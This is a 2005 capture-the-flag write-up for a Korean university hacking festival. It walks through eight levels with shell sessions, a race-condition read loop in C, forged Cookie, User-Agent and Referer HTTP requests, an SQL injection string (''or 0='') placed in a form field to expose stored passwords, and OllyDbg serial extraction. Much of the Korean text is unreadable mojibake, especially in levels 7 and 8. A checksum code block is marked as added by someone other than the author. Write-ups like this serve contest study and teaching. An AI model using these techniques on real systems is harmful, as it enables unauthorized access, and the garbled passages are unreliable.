==========================
/ SoonChunhyang Univ.    /
/ Hacking Festival       /
/               (report) /
==========================

[hkpco@ns hkpco]# whoami
id        / hkpco
mail&msn  / hkpco@korea.com
homepage  / http://hkpco.kr/
name      / 
school    / б



| Contents |
----------------------------------------------------------------
  1.  level1	- Computer Knowledge Test                      |
  2.  level2	- Finding Directory and Similar Race Condition |
  3.  level3	- Equation problem and Interrupt               |
  4.  level4	- Reverse Engineering -1                       |
  5.  level5	- Guessing Account and Using a Method          |
  6.  level6	- Checksum calculation                         |
  7.  level7	- Sql Injection                                |
  8.  level8	- Reverse Engineering -2                       |
----------------------------------------------------------------



!!!!!!!!!!!!!!!!!! level1 - Computer Knowledge Test !!!!!!!!!!!!!!!!!!

/*
	A password is given when 18 or more are answered correctly.
*/

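level1 consists of 20 questions, and 18 or more must be answered correctly to move on to the next level.
The answers are easy to find with a search engine.

There is also another way: with fewer than 18 correct, a message saying the answers are wrong is shown,
but going back from there leaves the answers we entered exactly as they were.
So only the wrong answers need to be changed before solving it again.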

{ When 18 or more are correct }
18  ߾ ϴ. level1 password is : no surprise





!!!!!!!!!!!!!!!!!! level2 - Finding Directory and Similar Race Condition !!!!!!!!!!!!!!!!!!

/*
	59.27.205.110 id: level2
*/

 ̵ ־ϴ.
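At first I took this for an ssh brute_force task and was about to try that, but the password obtained in level1 turned out to be the level2 password.

After logging in, ls -al shows three oddly named directories, which look suspicious.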

ssh login: level2
Password:
Last login: Mon Nov 28 21:10:17 2005 from 61.99.161.93
[level2@stage1 ~]$ ls -al
 44
drwxr-xr-x  3 root    root    4096 11?
drwxr-xr-x  2 root    root    4096 11?
drwxr-x---  5 root    level2  4096 11?
drwxr-xr-x  5 root    root    4096 11?.
lrwxrwxrwx  1 root    root       9 11?bash_history -> /dev/null
-rw-r--r--  1 level2  level2    24 11?bash_logout
-rw-r--r--  1 level2  level2   191 11?bash_profile
-rw-r--r--  1 level2  level2   124 11?bashrc
-rwxr-xr-x  1 marilyn marilyn 1167 11?viminfo

Tab completion shows the names in more detail.


[level2@stage1 ~]$ ls [tab][tab]
^B/            .bash_history  .bash_profile  .viminfo       Hint
^V/            .bash_logout   .bashrc        ?/

^B , ^V , ^?  ϳ    Դϴ.


To check the directory names, hexdump or xxd can be used to view the hexadecimal codes of the names.

[level2@stage1 ~]$ ls|xxd
0000000: 020a 160a 3f0a 4869 6e74 0a              ....?.Hint.


After looking through them, I confirmed that password is inside ^B.
However, password could not be read with level2 privileges.

[level2@stage1 ~]$ cd `printf "\x02"`
[level2@stage1 ]$ ls
chamber of secret
[level2@stage1 ]$ cd chamber\ of\ secret\ \ \ \ \ \ \ \ \ \ \ \ \ \ /
[level2@stage1 chamber of secret              ]$ ls
password  tmp
[level2@stage1 chamber of secret              ]$ ls -l password
-r--r-----  1 root root 42 11?assword


While looking around, I noticed that password is given read permission for other every so often.

[level2@stage1 chamber of secret              ]$ ls -al password
-r--r-----  1 root root 42 11?assword
[level2@stage1 chamber of secret              ]$ ls -al password
-r--r-----  1 root root 42 11?assword
[level2@stage1 chamber of secret              ]$ ls -al password
-r--r-----  1 root root 42 11?assword
[level2@stage1 chamber of secret              ]$ ls -al password
-r--r-----  1 root root 42 11?assword
[level2@stage1 chamber of secret              ]$ ls -al password
-r--r-----  1 root root 42 11?assword
[level2@stage1 chamber of secret              ]$ ls -al password
-r--r--r--  1 root root 42 11?assword

       read has been granted to other!.


So code that reads password in a loop will eventually print it.
I wrote it in C.

- read_loop.c -

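#include <stdio.h>
#include <stdlib.h>	/* system() */
#include <unistd.h>

int main( void )
{
	/* keep trying to read the file; cat only succeeds during the
	   moments when "other" has read permission */
	while(1)
	{
		system( "cat /home/level2/`printf \"\x02\"`/cha*/password" );
	}
}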

[level2@stage1 tmp]$ cat > read_loop.c
#include <stdio.h>
#include <unistd.h>

int main( void )
{
        while(1)
        {
                system( "cat /home/level2/\`printf \"\x02\"\`/cha\*/password" );
        }
}
[level2@stage1 tmp]$ gcc -o read_loop read_loop.c
[level2@stage1 tmp]$ ./read_loop 2>/dev/null
good job :)

password is "info security"





!!!!!!!!!!!!!!!!!! level3 - Equation problem and Interrupt !!!!!!!!!!!!!!!!!!

/*
	59.27.205.110 id: level3

	[level3@stage1 ~]$ cat Hint

	x*x*x*x - 34*x*x*x - 340*x*x + 1858*x + 12915

	        a < b < c < d
*/

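Log in to level3 with the password obtained in level2.
After logging in, Hint shows the quartic equation above.
It can be solved by hand, or the roots can be found easily with a program such as Matlab.

The roots obtained this way are as follows.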

        a < b < c < d

       -9 < -5 < 7 < 41

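Now the level3 program itself has to be passed.
Running the program named level3 prints OOps d = 1 , OOps d = 2 , OOps d = 3 ........ at one-second intervals.
Trying to stop it with interrupts such as ctrl+c and ctrl+x showed that, as below,
the values increase or decrease depending on the interrupt.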

 OOps a = -1 , OOps c = 1 , OOps d = 12 ................

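Watching this, I figured that
the interrupts of the level3 program have to be used to set the variables to the roots we found.

Each variable is changed by the interrupt listed below.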

==========================
a = Ctrl + C
b = Ctrl + \
c = Ctrl + Z
d = 1sec +1 
==========================

When a, b, c and d are set as above ( note that a, b and c must be set before d reaches 41 ),
the password is printed shortly afterwards.

OOps d = 38
OOps d = 39
OOps d = 40
OOps d = 41

rage against the cracker

OOps d = 42
OOps d = 43
OOps d = 44
OOps d = 45
OOps d = 46
OOps d = 47





!!!!!!!!!!!!!!!!!! level4 - Reverse Engineering -1 !!!!!!!!!!!!!!!!!!

/*
	http://59.27.205.110/level4/tksgkr/quest4.exe
*/

This is a reverse engineering problem.
̹  ణ ٸ ð ѱ ϴ. ^^

ó  Ϸ  ʰ  ִ  ip, ȸ ip range    
hkscan x.x.x.0 ~ x.x.x.255 , y.y.y.0 ~ y.y.y.255   80Ʈ   ãƼ
 .index.bak û ҽϴ.
, û ߸Ǿ ᱹ   , Ǹ ã γ ˾Ƴ Ǿϴ.

First, open level4.exe in ollydbg.
Looking through it slowly, it sends the request below to port 80 of the ip that was entered.

GET .index.bak HTTP/1.0
User-Agent: HTTPTEST

I figured that finding a particular server address would lead to the answer.
[Search for] -> [All referenced text strings] shows four values that look suspicious.

1) ASCII "0592842722"
2) ASCII "2027148262"
3) ASCII "2320512323"
4) ASCII "2221114222"

Ƹ  װ  ip   ִ õ Ǵ° ҽϴ.
1)  break ɰ run Ͽ ƹ ̳   F8 ̿Ͽ ϳϳ 찬ϴ.
  loop  4 ȯϴµ ip  ־ϴ!..

F8 ̿Ͽ 4  ȯŰ  츮 ϰߴ ip ٷ  ipϴ!..
..  ip_range scanϿ û   ¾ ̷ ð   ݰԲ ϴ.

Connecting to port 80 with telnet and requesting .index.bak gives the following.

[hkpco@ns sch]$ telnet 59.027.205.111 80
Trying 59.27.205.111...
Connected to 59.027.205.111.
Escape character is '^]'.
GET /.index.bak HTTP/1.0

HTTP/1.1 200 OK
Date: Sun, 27 Nov 2005 16:43:29 GMT
Server: Apache/2.0.52 (Fedora)
Last-Modified: Sat, 26 Nov 2005 00:17:50 GMT
ETag: "a81d0-3a-ccdb4780"
Accept-Ranges: bytes
Content-Length: 58
Connection: close
Content-Type: text/plain; charset=UTF-8

ISEhTGV2ZWw0ICEhIQ0KUGFzc3dvcmQgOiBrbm93IHlvdXIgZW5lbXk=

Connection closed by foreign host.


The password ISEhTGV2ZWw0ICEhIQ0KUGFzc3dvcmQgOiBrbm93IHlvdXIgZW5lbXk= is base64 encoded; decoding it gives

!!!Level4 !!! Password : know your enemy





!!!!!!!!!!!!!!!!!! level5 - Guessing Account and Using a Method !!!!!!!!!!!!!!!!!!

/*
	http://59.27.205.110/level5/guqehdrhks/level5.html

	α :
	id :
	pass : 

	level5 ȼ پ "SecurityFirst Explorer"  Ͽ ϰ 

	192.168.111.222/level5.html   Ͽ Ѵ.

	guest page   |  level5 page

*/

̹  idpass Ͽ  μ  level5 Ͽ մϴ.
Ƹ guest page  Ǿִ°  ̵ guestΰ ϴ.( ߿ Ʈ guest Ա.. ^^ )
pass a ϴ 4ڿϴ.
  pass asdf° ϰ   ־ϴ.

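After logging in, a message saying that guest has logged in appears, and a refresh takes us back to the original page.
I checked the cookie with javascript:document.cookie.

It shows user=guest, so the cookie for level5 is probably user=level5.
Also, it says that a browser called SecurityFirst Explorer must be used;
browser information is carried in User-Agent, so setting our User-Agent to SecurityFirst Explorer
gets us past the browser check.
I sent a request built this way.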

[hkpco@ns hkpco]$ telnet 59.27.205.110 80
Trying 59.27.205.110...
Connected to 59.27.205.110.
Escape character is '^]'.
GET http://59.27.205.110/level5/guqehdrhks/level5.php HTTP/1.0
User-Agent: SecurityFirst Explorer
Cookie: user=level5;

HTTP/1.1 200 OK
Date: Mon, 28 Nov 2005 12:00:55 GMT
Server: Apache/2.0.53 (Fedora)
X-Powered-By: PHP/4.3.11
Content-Length: 134
Connection: close
Content-Type: text/html; charset=EUC-KR
Content-Language: kr

<script>alert('192.168.111.222/level5.html   Ͽ Ѵ');</script>
<meta http-equiv= refresh content=1;url=level5.html>

Connection closed by foreign host.


It does not give the password, saying we must come via 192.168.111.222/level5.html.
ó ʹ    192.168.111.222/level5.html  Ͽ ϴ  ˰ ޿ϴ.
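Looking again, since we have to come via 192.168.111.222/level5.html, I used the Referer method.
Referer indicates the page visited immediately before the current one.

Let's send the request once more with Referer added.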

[hkpco@ns sch]$ telnet 59.27.205.112 80
Trying 59.27.205.112...
Connected to 59.27.205.112.
Escape character is '^]'.
GET http://59.27.205.112/level5/guqehdrhks/level5.php HTTP/1.0
User-Agent: SecurityFirst Explorer
Referer: 192.168.111.222/level5.html
Cookie: user=level5;

HTTP/1.1 200 OK
Date: Sun, 27 Nov 2005 20:30:00 GMT
Server: Apache/2.0.52 (Fedora)
X-Powered-By: PHP/4.3.9
Content-Length: 81
Connection: close
Content-Type: text/html; charset=EUC-KR

 <br> level5  ȳϼ. <br>  level5  н plastic tree Դϴ.<br>

Connection closed by foreign host.

Obtained the level5 password!.





!!!!!!!!!!!!!!!!!! level6 - Checksum calculation !!!!!!!!!!!!!!!!!! 

/*
	http://59.27.205.110/level6/WkWk/level6.html

		IPv4 header (1) 
	-------------------------------- 
	45  00  00  40  F5  DA  40  00  80  06  
	        C0  A8  00  02  42  A1  27  C3  

		IPv4 header (2) 
	-------------------------------- 
	45  00  00  3E  24  BD  00  00  80  11  
	        3B  1B  CD  78  A8  7E  3F  01  
*/

 2ĭ  4ĭ  ִµ, Ŷ ĸ   ĭ Checksumΰ    ֽϴ.
 м  Ʒ   ˴ϴ.

(45  00)ip_version
(00  40)total_length
(F5  DA)id
(40  00)flags
(80)time_to_live: 128
(06)protocol -TCP
(      )check_sum
(C0  A8  00  02)source_ip: 192.168.0.2
(42  A1  27  C3)des_ip   : 66.161.39.195
  


(45  00)ip_version
(00  3E)total_length
(24  BD)id
(00  00)flags
(80)time_to_live
(11)protocol
(      )check_sum
(3B  1B  CD  78)source_ip: 59.27.205.120
(A8  7E  3F  01)des_ip   : 168.126.63.1

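This value can be computed with the checksum function used in raw socket programming, or worked out by hand.
Here we compute the checksum of IPv4 header (1) by hand.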

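{ checksum calculation }
================================================================
1. Add up all the 16-bit words.
2. Add the upper 16 bits to the lower 16 bits to get a 16-bit value.
3. Take the one's complement; the result is the checksum.
================================================================



4500+0040+F5DA+4000+8006+C0A8+0002+42A1+27C3 = 3262E ( add all the 16-bit words )

3262E = 262E , 0003 / 262E + 0003 = 2631 ( the sum exceeds 16 bits, so the upper and lower 16 bits are added to get 16 bits )

0010 0110 0011 0001 -> 1101 1001 1100 1110 ( convert to binary, then take the one's complement )

11011001 11001110 -> D9 CE ( D9 CE is the checksum of IPv4 header(1) )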

̷  IPv4 header(2) ؼ ־ ...

password is "packet storm"
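
The hand calculation above as code, applied to both headers from the level6 page. This is an added example, not the author's code; the function names are assumptions. For header (1) it returns D9CE, the same bits as the 1101 1001 1100 1110 worked out above.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Internet checksum (RFC 1071): add big-endian 16-bit words, fold the
 * carries back into the low 16 bits, return the one's complement. */
uint16_t ip_checksum(const uint8_t *hdr, size_t len)
{
    uint32_t sum = 0;
    size_t i;

    for (i = 0; i + 1 < len; i += 2)    /* step 1: add the 16-bit words */
        sum += ((uint32_t)hdr[i] << 8) | hdr[i + 1];
    if (len & 1)                        /* odd length: pad last byte with 0 */
        sum += (uint32_t)hdr[len - 1] << 8;
    while (sum >> 16)                   /* step 2: fold the carries */
        sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)~sum;              /* step 3: one's complement */
}

/* Zero bytes 10-11, compute the checksum and store it there. */
uint16_t fill_checksum(uint8_t *hdr, size_t len)
{
    uint16_t c;
    hdr[10] = hdr[11] = 0;
    c = ip_checksum(hdr, len);
    hdr[10] = (uint8_t)(c >> 8);
    hdr[11] = (uint8_t)(c & 0xFF);
    return c;
}

/* Receiver-side check: a header carrying a correct checksum sums to 0. */
int header_ok(const uint8_t *hdr, size_t len)
{
    return ip_checksum(hdr, len) == 0;
}

/* The two headers from the page, blank checksum field set to 00 00. */
const uint8_t HDR1[20] = { 0x45,0x00,0x00,0x40,0xF5,0xDA,0x40,0x00,0x80,0x06,
                           0x00,0x00,0xC0,0xA8,0x00,0x02,0x42,0xA1,0x27,0xC3 };
const uint8_t HDR2[20] = { 0x45,0x00,0x00,0x3E,0x24,0xBD,0x00,0x00,0x80,0x11,
                           0x00,0x00,0x3B,0x1B,0xCD,0x78,0xA8,0x7E,0x3F,0x01 };

int main(void)
{
    printf("header (1): %04X\n", ip_checksum(HDR1, sizeof HDR1));
    printf("header (2): %04X\n", ip_checksum(HDR2, sizeof HDR2));
    return 0;
}
```

header_ok() is the check a receiver performs: any single changed byte in a filled-in header makes it fail.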





!!!!!!!!!!!!!!!!!! level7 - Sql Injection !!!!!!!!!!!!!!!!!! 

/*
	http://59.27.205.110/level7/dkdfl/level7.html

	     :
	     :
	Ϲȣ :

	[ Ȯϱ ]
*/

е   Ǭ Ӹ ϴ ΰ ϴ. :-)

̸ , Ϲȣ      Ȯϱ ư  츮 Էߴ  ɴϴ.
javascript:document.cookie ̿Ͽ Ű ԵǸ Ϲȣ ԷϿ  Ű ˴ϴ.
׷  κ ȸϵ  sql ϸ  ϰԵǾ, ڿ  
 Ӹ ƴ϶ ٸ Է 鵵    ְ ˴ϴ.
Ϲȣ 'or 0=' Ͱ sql ȸϴ   Ͽ Ȯϱ⸦ Ŭ 
  Է  Ȯ   ִµ ãƺ,   н尡 ֽϴ.

***********************************************

your information :

  : password is :
  : comeasyouare
Ϲȣ : 2002338720034713

***********************************************

password is comeasyouare ^^





!!!!!!!!!!!!!!!!!! level8 - Reverse Engineering -2 !!!!!!!!!!!!!!!!!! 

/*
	http://59.27.205.110/level8/chlrhdi/level8.exe
*/

   Ͽϴ.
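Like level4, level8 is a problem solved by reverse engineering.
Looking through the program, I saw some hexadecimal codes, so I converted them to characters with the program below.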

[hkpco@ns public_html]$ cat hk.c
/*
        made by hkpco
        mail&msn : hkpco@korea.com
        homepage : http://hkpco.kr/
*/

#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

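int main( int argc , char **argv )
{
        int i=0;
        unsigned int s=0;       /* %x requires an unsigned int */

        char *ch[256] = { 0x00, };

        if( argc < 3 )
        {
                fprintf( stderr , "fuck\n" );
                return -1;
        }

        /* argv[1]: string of hex bytes, argv[2]: delimiter characters */
        ch[0] = strtok( argv[1] , argv[2] );

        while( ch[i] != NULL )
        {
                /* print each hex token as one character */
                if( sscanf( ch[i] , "%x" , &s ) == 1 )
                        printf( "%c" , (int)s );

                if( ++i >= 256 )        /* stay inside ch[] */
                        break;

                ch[i] = strtok( NULL , argv[2] );
        }

        printf( "\n" );
        return 0;

}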
[hkpco@ns public_html]$ ./hk "3B 10 40 00 00 00 00 00 6F 75 20 61 47 6F 6F 64 20 49 73 20 72 79 20 79 20 00 00 00
                              72 65 20 77 00 00 00 00 18 22 40 00 00 00 00 00 88 FE 12 00 98 0A 00 00" " "
;@ou aGood Is ry y re w"@?

ݺ Ǯ̿ʹ   ° ҽϴ.

   ڽϴ.
Open level8.exe with ollydbg.
Use [Search for] -> [All referenced text strings] to find the strings.

ASCII " Sorry You are wrong "
ASCII "Good Job! Serial Is Right!"
ASCII " Sorry You are wrong "
ASCII " Sorry You are wrong "
ASCII "sch_sf.exe"
̺κе Ǯ̿  ִ°ó Դϴ.

ASCII " Sorry You are wrong "
ASCII "Good Job! Serial Is Right!"
ASCII " Sorry You are wrong "
ASCII " Sorry You are wrong "
Set a break here, run the program, enter arbitrary strings and confirm.
Execution then stops at the place where we set the break.

00401749  |. 68 44404000    PUSH level8.00404044                     ;  ASCII " Sorry You are wrong "
̺κп ݸ  ԵǸ

0040170C  /$ 55             PUSH EBP
̷ α׷ κ ƾ ϴ κ ְԵ˴ϴ.
Ʒ ڽ  Local call from 004016E6̶ ִµ ̰ call κ ̵ϱ Ͽ
[Go to] -> [Call from 004016E6]  մϴ.

׷ ٷ   ǵ,  󰡼 Ʒ   ƾ ۺκ  ̵մϴ.
0040142B  /. 55             PUSH EBP

⼭ ̵  ȣȭϿ ϰ ϴ  ϰ ˴ϴ.
 󰡸鼭   , ؾ   ϳ sch_sf.exe̾
 ϳ    ֽϴ.

The part shown below is where the value we entered is compared with the serial number.

004016BB  |. 3B42 60        CMP EAX,DWORD PTR DS:[EDX+60]

̷  ̰ break ɰ ٽ α׷   ڿ  Էմϴ.
׷ 츮 break  ̵ϰ Ǵµ Ʒ ڽ ø 
EAX   츮 ϴ ø ȣԴϴ.
   Input Name  ϴµ,  κ Խǿ   ø   ֽϴ.

->
Name - securityfirst    ϵ, ̳ʸ ġϰų   ƾ  Ұ, ִ ״ Ǯ մϴ.
<-

So Input Name must be securityfirst.
Set a break on the serial comparison again, enter securityfirst as Input Name and confirm; the break on CMP is hit,
and in the box below, EAX holds the serial number.

Stack DS:[0012FEE4]=423A35C7
EAX=1AE55C30

Converting the EAX value 1AE55C30 to decimal gives the serial we want.

1AE55C30 -> 451238960

׸......

Level Clear...!
